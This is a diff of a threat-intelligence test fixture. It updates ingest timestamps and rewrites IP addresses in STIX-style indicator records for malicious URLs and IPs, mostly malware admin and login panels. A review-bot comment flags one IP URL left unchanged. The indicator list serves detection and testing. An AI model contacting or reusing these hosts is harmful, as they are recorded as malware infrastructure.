@@ -11542,7 +11542,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386115648Z", + "ingested": "2021-12-13T08:38:40.023886900Z", "original": "{\"created\":\"2020-01-29T03:02:42.367Z\",\"description\":\"TS ID: 55266538986; iType: mal_url; State: active; Org: Eonix Corporation; Source: CyberCrime\",\"id\":\"indicator--0005f77c-327b-4b69-8046-777efe95361d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-29T03:02:42.367Z\",\"name\":\"mal_url: http://microsoftrenat.site/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://microsoftrenat.site/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:42.367Z\"}", "category": "threat", "type": "indicator", @@ -11594,7 +11594,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386120067Z", + "ingested": "2021-12-13T08:38:40.023894300Z", "original": "{\"created\":\"2020-01-29T03:02:48.869Z\",\"description\":\"TS ID: 55266539005; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--2ef4b932-5434-49f4-8255-a70de96893d8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T03:02:48.869Z\",\"name\":\"mal_url: http://ecoorganic.co/Work3/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work3/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:48.869Z\"}", "category": "threat", "type": "indicator", 
@@ -11613,7 +11613,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 31.31.196.78", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55266538991; iType: mal_ip; State: active; Org: Domain names registrar REG.RU, Ltd; Source: CyberCrime", "modified": "2020-01-29T03:02:48.897Z", "valid_from": "2020-01-29T03:02:48.897Z", @@ -11635,12 +11635,12 @@ "first_seen": "2020-01-29T03:02:48.897Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "31.31.196.78" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386124685Z", - "original": "{\"created\":\"2020-01-29T03:02:48.897Z\",\"description\":\"TS ID: 55266538991; iType: mal_ip; State: active; Org: Domain names registrar REG.RU, Ltd; Source: CyberCrime\",\"id\":\"indicator--becea156-fb29-4cd3-80b1-55cb739e0b6c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-21\"],\"modified\":\"2020-01-29T03:02:48.897Z\",\"name\":\"mal_ip: 31.31.196.78\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '31.31.196.78']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:48.897Z\"}", + "ingested": "2021-12-13T08:38:40.023901700Z", + "original": "{\"created\":\"2020-01-29T03:02:48.897Z\",\"description\":\"TS ID: 55266538991; iType: mal_ip; State: active; Org: Domain names registrar REG.RU, Ltd; Source: CyberCrime\",\"id\":\"indicator--becea156-fb29-4cd3-80b1-55cb739e0b6c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-21\"],\"modified\":\"2020-01-29T03:02:48.897Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:48.897Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -11690,7 +11690,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386129434Z", + "ingested": "2021-12-13T08:38:40.023906400Z", "original": "{\"created\":\"2020-01-30T02:58:32.284Z\",\"description\":\"TS ID: 55270319168; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--8da10219-9eb1-4963-8889-587598e511cd\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-01-30T02:58:32.284Z\",\"name\":\"mal_url: http://www.cpadeer.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://www.cpadeer.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-30T02:58:32.284Z\"}", "category": "threat", "type": "indicator", @@ -11742,7 +11742,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386134083Z", + "ingested": "2021-12-13T08:38:40.023910600Z", "original": "{\"created\":\"2020-01-31T02:19:29.045Z\",\"description\":\"TS ID: 55274447486; iType: mal_url; State: active; Org: SingleHop LLC; Source: CyberCrime\",\"id\":\"indicator--093bf827-0d84-4b54-9d62-dffffd0a619b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-31T02:19:29.045Z\",\"name\":\"mal_url: http://cleaning-hygiene.com/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://cleaning-hygiene.com/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-31T02:19:29.045Z\"}", "category": "threat", "type": "indicator", 
@@ -11794,7 +11794,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386138672Z", + "ingested": "2021-12-13T08:38:40.023915800Z", "original": "{\"created\":\"2020-01-31T02:22:09.726Z\",\"description\":\"TS ID: 55274447484; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--51d4eb13-adf7-4de1-a3f0-106d343ad560\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-31T02:22:09.726Z\",\"name\":\"mal_url: http://corpcougar.com/buggy/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://corpcougar.com/buggy/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-31T02:22:09.726Z\"}", "category": "threat", "type": "indicator", @@ -11846,7 +11846,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386143631Z", + "ingested": "2021-12-13T08:38:40.023919900Z", "original": "{\"created\":\"2020-02-01T02:03:02.79Z\",\"description\":\"TS ID: 55277443309; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--a5926161-953c-4763-9d10-0c5e10bcd4e4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-01T02:03:02.79Z\",\"name\":\"mal_url: http://marubemi.com/owen/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://marubemi.com/owen/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:03:02.79Z\"}", "category": "threat", "type": "indicator", 
@@ -11865,7 +11865,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 62.76.41.133", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55277443409; iType: mal_ip; State: active; Org: IT House, Ltd; Source: CyberCrime", "modified": "2020-02-01T02:03:07.047Z", "valid_from": "2020-02-01T02:03:07.047Z", @@ -11887,12 +11887,12 @@ "first_seen": "2020-02-01T02:03:07.047Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "62.76.41.133" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386148019Z", - "original": "{\"created\":\"2020-02-01T02:03:07.047Z\",\"description\":\"TS ID: 55277443409; iType: mal_ip; State: active; Org: IT House, Ltd; Source: CyberCrime\",\"id\":\"indicator--ee4a872e-e53e-428f-86a1-32c4e4db68f6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-28\"],\"modified\":\"2020-02-01T02:03:07.047Z\",\"name\":\"mal_ip: 62.76.41.133\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '62.76.41.133']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:03:07.047Z\"}", + "ingested": "2021-12-13T08:38:40.023926200Z", + "original": "{\"created\":\"2020-02-01T02:03:07.047Z\",\"description\":\"TS ID: 55277443409; iType: mal_ip; State: active; Org: IT House, Ltd; Source: CyberCrime\",\"id\":\"indicator--ee4a872e-e53e-428f-86a1-32c4e4db68f6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-28\"],\"modified\":\"2020-02-01T02:03:07.047Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:03:07.047Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -11943,7 +11943,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386152518Z", + "ingested": "2021-12-13T08:38:40.023930100Z", "original": "{\"created\":\"2020-02-01T02:03:48.038Z\",\"description\":\"TS ID: 55277443373; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--8494f340-0964-47f0-ba09-78fe0b76eb34\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-01T02:03:48.038Z\",\"name\":\"mal_url: http://zeyadigital.com/etty/black/download/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://zeyadigital.com/etty/black/download/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:03:48.038Z\"}", "category": "threat", "type": "indicator", @@ -11995,7 +11995,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386159300Z", + "ingested": "2021-12-13T08:38:40.023935500Z", "original": "{\"created\":\"2020-02-01T02:03:48.079Z\",\"description\":\"TS ID: 55277443242; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--f051e10a-76c9-4f14-9fa3-9dbccc65c26f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-01T02:03:48.079Z\",\"name\":\"mal_url: http://farzanatradings.com/maindon/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farzanatradings.com/maindon/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:03:48.079Z\"}", "category": "threat", "type": "indicator", 
@@ -12047,7 +12047,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386164280Z", + "ingested": "2021-12-13T08:38:40.023939400Z", "original": "{\"created\":\"2020-02-01T02:04:16.392Z\",\"description\":\"TS ID: 55277443446; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime\",\"id\":\"indicator--79c8f52b-f134-4e02-ad7a-6169063c8fba\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-01T02:04:16.392Z\",\"name\":\"mal_url: http://trouserlanditd.com/draw/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://trouserlanditd.com/draw/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:04:16.392Z\"}", "category": "threat", "type": "indicator", @@ -12099,7 +12099,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386168999Z", + "ingested": "2021-12-13T08:38:40.023943600Z", "original": "{\"created\":\"2020-02-01T02:04:21.636Z\",\"description\":\"TS ID: 55277443452; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--7338fc3d-2a1f-4583-b34d-eb76912a43e6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-01T02:04:21.636Z\",\"name\":\"mal_url: http://krompres.tk/loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://krompres.tk/loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:04:21.636Z\"}", "category": "threat", "type": "indicator", 
@@ -12118,7 +12118,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://5.188.60.23/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55277443202; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", "modified": "2020-02-01T02:04:21.676Z", "valid_from": "2020-02-01T02:04:21.676Z", 
@@ -12142,16 +12142,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://5.188.60.23/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "5.188.60.23", - "full": "http://5.188.60.23/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386173357Z", - "original": "{\"created\":\"2020-02-01T02:04:21.676Z\",\"description\":\"TS ID: 55277443202; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--1f9e0571-119c-448a-8656-fec49c9c058a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-01T02:04:21.676Z\",\"name\":\"mal_url: http://5.188.60.23/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://5.188.60.23/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:04:21.676Z\"}", + "ingested": "2021-12-13T08:38:40.023948Z", + "original": "{\"created\":\"2020-02-01T02:04:21.676Z\",\"description\":\"TS ID: 55277443202; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--1f9e0571-119c-448a-8656-fec49c9c058a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-01T02:04:21.676Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:04:21.676Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -12201,7 +12201,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386178006Z", + "ingested": "2021-12-13T08:38:40.023951500Z", "original": "{\"created\":\"2020-02-01T02:04:21.705Z\",\"description\":\"TS ID: 55277443078; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--d1161e31-f661-469c-b206-84e1d416e577\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-73\"],\"modified\":\"2020-02-01T02:04:21.705Z\",\"name\":\"mal_url: http://gosdick.beget.tech/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gosdick.beget.tech/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:04:21.705Z\"}", "category": "threat", "type": "indicator", @@ -12220,7 +12220,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 185.22.155.46", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55277442685; iType: mal_ip; State: active; Org: LLC Baxet; Source: CyberCrime", "modified": "2020-02-01T02:04:21.745Z", "valid_from": "2020-02-01T02:04:21.745Z", 
@@ -12242,12 +12242,12 @@ "first_seen": "2020-02-01T02:04:21.745Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "185.22.155.46" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386182444Z", - "original": "{\"created\":\"2020-02-01T02:04:21.745Z\",\"description\":\"TS ID: 55277442685; iType: mal_ip; State: active; Org: LLC Baxet; Source: CyberCrime\",\"id\":\"indicator--8f0a9931-5ee4-4b0e-b473-b130d72ef175\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-17\"],\"modified\":\"2020-02-01T02:04:21.745Z\",\"name\":\"mal_ip: 185.22.155.46\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '185.22.155.46']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:04:21.745Z\"}", + "ingested": "2021-12-13T08:38:40.023956800Z", + "original": "{\"created\":\"2020-02-01T02:04:21.745Z\",\"description\":\"TS ID: 55277442685; iType: mal_ip; State: active; Org: LLC Baxet; Source: CyberCrime\",\"id\":\"indicator--8f0a9931-5ee4-4b0e-b473-b130d72ef175\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-17\"],\"modified\":\"2020-02-01T02:04:21.745Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:04:21.745Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -12298,7 +12298,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386186692Z", + "ingested": "2021-12-13T08:38:40.023963Z", "original": "{\"created\":\"2020-02-01T02:05:07.232Z\",\"description\":\"TS ID: 55277443523; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--0068cb9c-0bdf-44a8-9563-5006e0c38921\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-02-01T02:05:07.232Z\",\"name\":\"mal_url: http://everest--sh.com/click/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://everest--sh.com/click/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:05:07.232Z\"}", "category": "threat", "type": "indicator", @@ -12317,7 +12317,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://92.63.197.156/tspir/index.php", + "name": "mal_url: http://89.160.20.156/tspir/index.php", "description": "TS ID: 55277442283; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime", "modified": "2020-02-01T02:05:07.274Z", "valid_from": "2020-02-01T02:05:07.274Z", 
@@ -12342,16 +12342,16 @@ "url": { "path": "/tspir/index.php", "extension": "php", - "original": "http://92.63.197.156/tspir/index.php", + "original": "http://89.160.20.156/tspir/index.php", "scheme": "http", - "domain": "92.63.197.156", - "full": "http://92.63.197.156/tspir/index.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/tspir/index.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386191341Z", - "original": "{\"created\":\"2020-02-01T02:05:07.274Z\",\"description\":\"TS ID: 55277442283; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--2dd49cbe-4835-49ea-a29c-b173c0840506\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-01T02:05:07.274Z\",\"name\":\"mal_url: http://92.63.197.156/tspir/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://92.63.197.156/tspir/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:05:07.274Z\"}", + "ingested": "2021-12-13T08:38:40.023969300Z", + "original": "{\"created\":\"2020-02-01T02:05:07.274Z\",\"description\":\"TS ID: 55277442283; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--2dd49cbe-4835-49ea-a29c-b173c0840506\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-01T02:05:07.274Z\",\"name\":\"mal_url: http://89.160.20.156/tspir/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/tspir/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:05:07.274Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -12402,7 +12402,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386195829Z", + "ingested": "2021-12-13T08:38:40.023975100Z", "original": "{\"created\":\"2020-02-01T02:06:07.042Z\",\"description\":\"TS ID: 55277443220; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime\",\"id\":\"indicator--b8e709b0-7eb8-4b2b-94f0-e21c4138cf9b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-01T02:06:07.042Z\",\"name\":\"mal_url: http://vware.duckdns.org/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://vware.duckdns.org/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:06:07.042Z\"}", "category": "threat", "type": "indicator", @@ -12454,7 +12454,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386200548Z", + "ingested": "2021-12-13T08:38:40.023981700Z", "original": "{\"created\":\"2020-02-01T02:06:15.505Z\",\"description\":\"TS ID: 55277443605; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--10e62d11-dbc5-4d39-badf-574aaab2d0f5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-02-01T02:06:15.505Z\",\"name\":\"mal_url: http://cokhiquangbien.com/.jx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://cokhiquangbien.com/.jx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:06:15.505Z\"}", "category": "threat", "type": "indicator", 
@@ -12506,7 +12506,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386204826Z", + "ingested": "2021-12-13T08:38:40.023989100Z", "original": "{\"created\":\"2020-02-01T02:06:15.674Z\",\"description\":\"TS ID: 55277443276; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--a84ddb39-c02c-44cc-bac3-0056c279454c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-01T02:06:15.674Z\",\"name\":\"mal_url: http://corpcougar.com/nedu/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://corpcougar.com/nedu/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:06:15.674Z\"}", "category": "threat", "type": "indicator", @@ -12557,7 +12557,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386209154Z", + "ingested": "2021-12-13T08:38:40.023996300Z", "original": "{\"created\":\"2020-02-01T02:06:38.684Z\",\"description\":\"TS ID: 55277443190; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--f667d2dd-f6df-4aa4-bd7b-8b7f3e98fa0a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-01T02:06:38.684Z\",\"name\":\"mal_url: http://bubble2.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://bubble2.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:06:38.684Z\"}", "category": "threat", "type": "indicator", 
@@ -12609,7 +12609,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386213492Z", + "ingested": "2021-12-13T08:38:40.024003700Z", "original": "{\"created\":\"2020-02-01T02:06:38.733Z\",\"description\":\"TS ID: 55277442690; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime\",\"id\":\"indicator--a81a2408-b11b-4b28-a5b6-ffec11942d62\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-32\"],\"modified\":\"2020-02-01T02:06:38.733Z\",\"name\":\"mal_url: http://144.202.96.212/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://144.202.96.212/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:06:38.733Z\"}", "category": "threat", "type": "indicator", @@ -12661,7 +12661,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386217991Z", + "ingested": "2021-12-13T08:38:40.024011Z", "original": "{\"created\":\"2020-02-01T02:06:49.292Z\",\"description\":\"TS ID: 55277443216; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--4a414cbe-3e02-48b9-84fb-103ed9961e6c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-02-01T02:06:49.292Z\",\"name\":\"mal_url: http://papafrog.beget.tech/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://papafrog.beget.tech/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:06:49.292Z\"}", "category": "threat", "type": "indicator", 
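Review bot: The record in the first hunk here (@@ -12609) still carries the IP-literal URL `http://144.202.96.212/panel/admin.php` in `event.original`, while the commit rewrites the comparable IP-literal URL indicators at @@ -12118, @@ -12317, @@ -12731 and @@ -12834 to `89.160.20.156`. If the intent is that every public IP in the fixture falls in the supported subset, this indicator's input record was presumably missed, and its `threat.indicator.url.domain` and `url.full` values (outside the hunk) would still hold the original address; either apply the same rewrite or state in the commit why this one is intentionally left unchanged. The enclosing document object starts and ends outside the hunk.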
@@ -12712,7 +12712,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386222349Z", + "ingested": "2021-12-13T08:38:40.024018300Z", "original": "{\"created\":\"2020-02-01T02:07:27.633Z\",\"description\":\"TS ID: 55277443028; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--27f66dbf-4ce9-4616-aef1-c6ab9f224ecb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-01T02:07:27.633Z\",\"name\":\"mal_url: http://t917659s.beget.tech/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://t917659s.beget.tech/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:07:27.633Z\"}", "category": "threat", "type": "indicator", @@ -12731,7 +12731,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://185.136.159.206/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55277443145; iType: mal_url; State: active; Org: Host Europe GmbH; Source: CyberCrime", "modified": "2020-02-01T02:07:36.513Z", "valid_from": "2020-02-01T02:07:36.513Z", 
